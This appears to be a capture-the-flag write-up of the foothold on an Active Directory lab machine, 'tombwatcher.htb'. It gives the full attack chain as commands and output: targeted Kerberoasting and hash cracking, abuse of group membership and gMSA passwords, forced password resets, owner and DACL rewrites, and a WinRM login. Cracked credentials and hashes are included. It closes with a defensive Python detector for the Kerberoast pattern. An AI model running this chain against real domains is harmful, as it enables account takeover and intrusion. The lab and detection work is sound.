Foothold
H3nry_987TGV!

❯ python3 ~/opt/AD/targetedKerberoast/targetedKerberoast.py -v -d "tombwatcher.htb" -u "henry" -p 'H3nry_987TGV!'

❯ hashcat -m 13100 alfred.hash ~/rockyou.txt -O --show
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$37<SNIP>8319d2cdd3:basketball
alfred:basketball

❯ bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "Infrastructure" "Alfred"
[+] Alfred added to Infrastructure
❯ net rpc group members "Infrastructure" -U "tombwatcher.htb"/"alfred"%"basketball" -S "dc01.tombwatcher.htb"
TOMBWATCHER\Alfred

❯ python3 ~/opt/AD/gMSADumper/gMSADumper.py -u 'alfred' -p 'basketball' -d 'tombwatcher.htb'
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::4f46405647993c7d4e1dc1c25dd6ecf4
ansible_dev$:aes256-cts-hmac-sha1-96:2712809c101bf9062a0fa145fa4db3002a632c2533e5a172e9ffee4343f89deb
ansible_dev$:aes128-cts-hmac-sha1-96:d7bda16ace0502b6199459137ff3c52d
ansible_dev$:::4f46405647993c7d4e1dc1c25dd6ecf4


❯ netexec smb 10.10.11.72 -u ansible_dev$ -H 4f46405647993c7d4e1dc1c25dd6ecf4 -M change-password -o USER='Sam' NEWPASS='Pwned123!'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\ansible_dev$:4f46405647993c7d4e1dc1c25dd6ecf4
CHANGE-P... 10.10.11.72 445 DC01 [+] Successfully changed password for Sam


❯ impacket-owneredit -action write -new-owner 'Sam' -target 'John' 'tombwatcher.htb'/'sam':'Pwned123!' -dc-ip 10.10.11.72
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!
❯ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'Sam' -target 'John' 'tombwatcher.htb'/'sam':'Pwned123!' -dc-ip 10.10.11.72
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20251010-211353.bak
[*] DACL modified successfully!
❯ python3 ~/opt/AD/targetedKerberoast/targetedKerberoast.py -v -d "tombwatcher.htb" -u "sam" -p 'Pwned123!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (john)
[+] Printing hash for (john)
$krb5tgs$23$*john$TOMBWATCHER.HTB$tombwatcher.htb/john*$5b11148ea0f7363512f0b42d11c6da91$<SNIP>
[VERBOSE] SPN removed successfully for (john)
Couldn't crack... PW reset it is
❯ netexec smb 10.10.11.72 -u Sam -p 'Pwned123!' -M change-password -o USER='John' NEWPASS='Pwned123!'
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\Sam:Pwned123!
CHANGE-P... 10.10.11.72 445 DC01 [+] Successfully changed password for John
❯ netexec winrm 10.10.11.72 -u John -p 'Pwned123!'
WINRM 10.10.11.72 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:tombwatcher.htb)
WINRM 10.10.11.72 5985 DC01 [+] tombwatcher.htb\John:Pwned123! (Pwn3d!)
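From the defender's side, the sequence targetedKerberoast leaves behind on john above (SPN written onto a user, RC4 service ticket pulled, SPN removed seconds later) is a tight pattern to correlate. The block below is an added example, not part of this writeup or of any of the tools used in it: it walks a list of simplified Windows Security events and reports that pattern. Event IDs 5136 and 4769 and encryption type 0x17 are real; the flattened record layout, the field names (who, obj, attr, op, svc, etype) and the sample records themselves are constructed assumptions.

```python
# Added example: flag the targetedKerberoast pattern (SPN add -> RC4 TGS request
# -> SPN remove) from Windows Security events. 5136 requires an object-modify
# SACL on the user objects; 4769 is logged by the DC by default. The records
# below are a constructed, flattened stand-in for what a SIEM would return.
from datetime import datetime, timedelta

EVENTS = [  # constructed sample mirroring the add -> roast -> remove sequence
    {"id": 5136, "t": "2025-10-10T21:14:01", "who": "sam",
     "obj": "CN=john,CN=Users,DC=tombwatcher,DC=htb",
     "attr": "servicePrincipalName", "op": "add"},
    {"id": 4769, "t": "2025-10-10T21:14:02", "who": "sam", "svc": "john", "etype": "0x17"},
    {"id": 5136, "t": "2025-10-10T21:14:03", "who": "sam",
     "obj": "CN=john,CN=Users,DC=tombwatcher,DC=htb",
     "attr": "servicePrincipalName", "op": "delete"},
    # benign AES ticket for the DC account: must not be flagged
    {"id": 4769, "t": "2025-10-10T22:00:00", "who": "alfred", "svc": "DC01$", "etype": "0x12"},
]

def _cn(dn):
    # First RDN value, lower-cased, so the 5136 object DN matches the 4769 service name.
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def find_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Return (requester, victim) pairs where an SPN was added to an account, an
    RC4 (0x17) service ticket for it was requested, and the SPN was removed again,
    all inside `window` of the add."""
    events = sorted(events, key=lambda e: e["t"])
    hits = []
    for i, e in enumerate(events):
        if e["id"] != 5136 or e["attr"] != "servicePrincipalName" or e["op"] != "add":
            continue
        victim, t0 = _cn(e["obj"]), datetime.fromisoformat(e["t"])
        roasted = removed = False
        for f in events[i + 1:]:
            if datetime.fromisoformat(f["t"]) - t0 > window:
                break
            if f["id"] == 4769 and f["svc"].lower() == victim and f["etype"] == "0x17":
                roasted = True
            elif roasted and f["id"] == 5136 and f["op"] == "delete" and _cn(f["obj"]) == victim:
                removed = True
                break
        if roasted and removed:
            hits.append((e["who"], victim))
    return hits

if __name__ == "__main__":
    for who, victim in find_targeted_kerberoast(EVENTS):
        print(f"[!] targeted Kerberoast: {who} set an SPN on {victim}, requested an RC4 ticket, then removed it")
```

An SPN add without the matching removal, or an AES-only ticket request, does not trigger; tune the window to how long your DC takes to log the three events.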
